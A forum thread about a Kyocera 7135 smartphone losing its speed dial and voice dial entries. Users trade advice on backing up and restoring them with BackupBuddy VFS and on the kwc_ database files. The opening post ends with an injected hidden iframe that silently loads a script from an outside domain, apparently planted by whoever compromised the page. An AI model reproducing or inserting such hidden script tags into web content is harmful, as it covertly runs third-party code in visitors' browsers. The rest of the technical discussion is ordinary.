+ Reply to Thread

Speed Dial and Voice Dial Gone

After programming a whole bunch of speed and voice dial names, I turned the phone on today and they're all goine. They seemed to work fine for a couple of days, then poof! The phone hasn't crashed and hasn't been reset. Anyone else seen this behavior? Very frustrating waste of time. Any way to back these up somewhere? I have an SD card in the phone.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Usually, only a hard reset (or hard crash) would do this. Very strange.
    ~'kito
    pdaPhoneHome Moderator

This happens to me on soft resets all the time; after the first time, I used BackupBuddyVFS (the free version), and it restores all VoiceDial and SpeedDial settings.
    Ahhhh, gadgets! :bigthumb:

Originally posted by SpikeyMikey
    This happens to me on soft resets all the time; after the first time, I used BackupBuddyVFS (the free version), and it restores all VoiceDial and SpeedDial settings.
    That's good to know about BackupBuddyVFS backing up those DB's. I had pretty much given up on using those features because they were lost so easily. Thanks for the tip
    Please visit my picture site: Robert-O-Rama :)

Anyone from Kyocera paying attention?

Thanks guys. This is a big problem, don't you think? A cell phone that loses its speed dials regularly, where people need to keep restoring (long process) or give up all together like one respondent is not a very safe device, is it?

Anyone there from Kyocera??? Do you guys expect us to dial while driving? I don't recommend that with this phone.

I do think it's a pretty dumb flaw for a "Smart"Phone, especially since everyone knows that the PalmOS experience involves semi-frequent resets. I would have thought that the SpeedDial and VoiceDial settings would at least be backed during a normal Hotsync.

But alas, I love this phone, and am willing to put up with a lot of "early adopter" pain for the rich feature set it offers. And if the resets ever become too frequent, I will likely try to figure out which file contains the unbacked-up settings and manually back them up to the SD card (since BackupBuddy's full restore is time-consuming).

Re: Speed Dial and Voice Dial Gone

Originally posted by 7135dan
    After programming a whole bunch of speed and voice dial names, I turned the phone on today and they're all goine. They seemed to work fine for a couple of days, then poof! The phone hasn't crashed and hasn't been reset. Anyone else seen this behavior? Very frustrating waste of time. Any way to back these up somewhere? I have an SD card in the phone.

When I hot sync AFTER i've changed the sync options for the contacts, i have to re-do my speed dials. It over wrties the phonebook data and the associated speed/voice dial info.

I am using ACT as my database and ACTlink as the conduits.

How do I just backup the speed and voicedials?

"I will likely try to figure out which file contains the unbacked-up settings and manually back them up to the SD card (since BackupBuddy's full restore is time-consuming)."

Good idea -- anyone know what these file names are? can i use the file manager?

Originally posted by SpikeyMikey
    Are you sure it backs up all of the VoiceDial settings? I have BackupBuddy (the purchased version) and I only recovered the SpeedDial settings after a hard reset. If you are correct, is there any special setting that you have?

I believe the filenames all start with "kwc_"
    You can use FileZ to enable the backup checkbox so the will get sync'ed.

Originally posted by RMSko
    Are you sure it backs up all of the VoiceDial settings? I have BackupBuddy (the purchased version) and I only recovered the SpeedDial settings after a hard reset. If you are correct, is there any special setting that you have?
    He said "BackupBuddy VFS". You said BackupBuddy. VFS is for backing up to the SD card and the later to your PC. Having said that I doubt there is a difference in the files you can select. I do a full (select all) backup to my SD card everyday at 3am and before I do anything risky. Also use BackupBuddy to the PC almost daily.

I have never tried a full restore from the PC (have to do that to test it). I have tested a few full restores after intentional hard resets from the SD card. *Both* VoiceDial and SpeedDial settings/lists were restored. Somewhere along the line my speed dial (1) reverted back to *86 from my cell number which I had changed it to. Don't know if this happened during the restore, some soft reset, or something else I did. I changed it back and it hasn't happened since?

One thing you have to remember with BackupBuddy VFS (if you use the advanced file list) is to update your selected list of files whenever you install anything. I assume the "backup all" option that doesn't use the advanced list generates its own each time you run it.

I'm guessing kwc_SpeedDialDB and kwc_VoiceTags.

-Quick

Originally posted by Quick
    He said "BackupBuddy VFS". You said BackupBuddy. VFS is for backing up to the SD card and the later to your PC. Having said that I doubt there is a difference in the files you can select. I do a full (select all) backup to my SD card everyday at 3am and before I do anything risky. Also use BackupBuddy to the PC almost daily.

I have never tried a full restore from the PC (have to do that to test it). I have tested a few full restores after intentional hard resets from the SD card. *Both* VoiceDial and SpeedDial settings/lists were restored. Somewhere along the line my speed dial (1) reverted back to *86 from my cell number which I had changed it to. Don't know if this happened during the restore, some soft reset, or something else I did. I changed it back and it hasn't happened since?

One thing you have to remember with BackupBuddy VFS (if you use the advanced file list) is to update your selected list of files whenever you install anything. I assume the "backup all" option that doesn't use the advanced list generates its own each time you run it.

I'm guessing kwc_SpeedDialDB and kwc_VoiceTags.

-Quick
    I am using BackupBuddy VFS (sorry for the confusion) and I have it selected to "backup all." However, I've done a few restores from the SD Card and it never has restored the VoiceDial numbers. Any thoughts on what I can do to fix that? If you can walk me through some exact steps I'd greatly appreciate it.

Originally posted by RMSko
    I am using BackupBuddy VFS (sorry for the confusion) and I have it selected to "backup all." However, I've done a few restores from the SD Card and it never has restored the VoiceDial numbers. Any thoughts on what I can do to fix that? If you can walk me through some exact steps I'd greatly appreciate it.
    There was one time I had to restore after a hard reset (that was a while ago), and my custom banner was NOT restored. I just went back to BBVFS and restored the saved prefs manually, and it worked. I'm not sure if this kind of "oversight" is typical. Try restoring the voice tags manually and see if that works. If you only have the free version, you'll have to do a full restore... Or you could use a file app to copy just that file to the RAM.

Can someone explain BackupBuddy VFS?

I just go a 256MB SD card. My Palm software has a Backup conduit so why do I need
    BackupBuddy?

Just curious?

Artkazi

Well... I'm using the registered version with the "advanced" features. That would be timed backup (you can select 1 time of day for an automatic backup to kick off), selectable file set for backup, and backups are incremental.

I'm guessing as to why your voice list doesn't get restored.

1) When doing a restore you should (unless you have a reason not to) respond "yes" to the prompt that tells you that the file you are restoring is older than the one on the handheld and do you want to overwrite the newer file with your backup copy. This is because the ROM applications will create new database files (empty) when booting from a hard reset. Then you go to restore the file from your backup and naturally its older than the newly created one.

2) Your backup list was created before you created any voice entries (and therefore there wasn't a voice entry file?). As I mentioned, I use the "advanced" features to select files to be backed up. It creates a list of all files, I choose "select all", then I un-select files I don't want to be backed up. If I then create a new file it does appear in the file list but it is *not* marked for backup. I have to select it for backup. Apparently when using the "select files to backup" feature the default is to add new files to the list as un-selected.

If you are using the free version or not using the advanced features of the registered version I do not know how the backup set is selected. I *assumed* that if you use the large "BackUp" button on the home screen it selects all files on the handset at that time. I have not done any testing to find out. You probably should query Blue Nomad's support for correct details. Maybe somebody here has experimented or knows exactly how it works. I'd hate to mislead you based on faulty assumptions and I don't have a lot of time to experiment with it.

-Quick

Originally posted by Quick
    Well... I'm using the registered version with the "advanced" features. That would be timed backup (you can select 1 time of day for an automatic backup to kick off), selectable file set for backup, and backups are incremental.

I'm guessing as to why your voice list doesn't get restored.

1) When doing a restore you should (unless you have a reason not to) respond "yes" to the prompt that tells you that the file you are restoring is older than the one on the handheld and do you want to overwrite the newer file with your backup copy. This is because the ROM applications will create new database files (empty) when booting from a hard reset. Then you go to restore the file from your backup and naturally its older than the newly created one.

2) Your backup list was created before you created any voice entries (and therefore there wasn't a voice entry file?). As I mentioned, I use the "advanced" features to select files to be backed up. It creates a list of all files, I choose "select all", then I un-select files I don't want to be backed up. If I then create a new file it does appear in the file list but it is *not* marked for backup. I have to select it for backup. Apparently when using the "select files to backup" feature the default is to add new files to the list as un-selected.

If you are using the free version or not using the advanced features of the registered version I do not know how the backup set is selected. I *assumed* that if you use the large "BackUp" button on the home screen it selects all files on the handset at that time. I have not done any testing to find out. You probably should query Blue Nomad's support for correct details. Maybe somebody here has experimented or knows exactly how it works. I'd hate to mislead you based on faulty assumptions and I don't have a lot of time to experiment with it.

-Quick
    I'm also using the Registered Version, but I have not been using the Advanced Backup. I have been using a timed backup and I have assumed it will backup all of the files. Maybe that is not correct.

Anyway, I'm not sure what you mean by the backup was created before I "created any voice entries (and therefore there wasn't a voice entry file?)". Won't it create a new backup each night and therefor if I created/edited the voice entries after I created a backup the next time I do a backup I would assume it would capture the new voice entries.

Well, I just went to advanced and selected all and then deselected a few files (BTW - there is a kwc_VoiceTags folder there, hopefully that is the right folder). Does this mean that it will now only (and automatically) backup all selected files on my previously scheduled backup times (2 am)? Any thoughts are appreciated.

If you go to Options > Preferences under Schedule: there is a checkbox for "Use my set". If this is checked it uses your selected files for the backup set. I guess what we want to know is if that box is not checked will the program build a new file list each time it gets ready to do a backup. I don't know.

I do know that if you do check the box it saves the list of files that you have selected. Default is none. If you tap "select all" it marks all the files in the list as selected. If you create a new file at some later time it will show up in the list as *not* selected.

What I was speculating was this:
    You made a backup list by tapping "select all".
    At some later time you created your *first* voice entry.
    It may be the case that the file containing voice entries is not created until you add the first voice dial entry. If so it might have been created after you created your list of selected files. It would not be in the backup list (not selected) at that point. You would have to go to your list and select it or tap "select all" again after the file was created. Just a guess...

So I don't think your problem is capturing new entries but capturing the file that entries go into (assumption is that they are entries in a file and each entry is not a separate file itself).

Try adding an entry, do a "select all" in the advanced screen, do a backup, do a hard reset, then restore from the card. Don't forget to use FileZ (or something) to copy the BackupBuddy VFS program from the card to ram afterwards.

-Quick

Originally posted by Artkazi

I just go a 256MB SD card. My Palm software has a Backup conduit so why do I need
    BackupBuddy?

Just curious?

Artkazi
    The value of BackupBuddyVFS vs. BackupBuddy is in the convenience of being able to do a backup w/out having your PC nearby--just backing up directly to the SD card.

Originally posted by Artkazi
    I just go a 256MB SD card. My Palm software has a Backup conduit so why do I need BackupBuddy?
    Just curious?
    Palm Software has backup conduits for the builtin apps. With just that not all files get backed up and certainly not addon apps and their data (unless they supply their own conduit -- many do) BackupBuddy will backup *all* files on the handheld. If you experience an hard reset or replace your device you can restore everything in a few minutes. -- from the PC --.

BackupBuddy VFS gives you BackupBuddy that allows you to backup and restore from your SD card. Unless you have a real space problem BackupBuddy VFS would be what you would probably use to restore. You don't need to get to your PC to do it.

On the other hand, if you were to drop your 7135 off a bridge *with* your SD card containing your backup in the phone... then it would be nice to have a full backup on your PC when the replacement arrived.

-Quick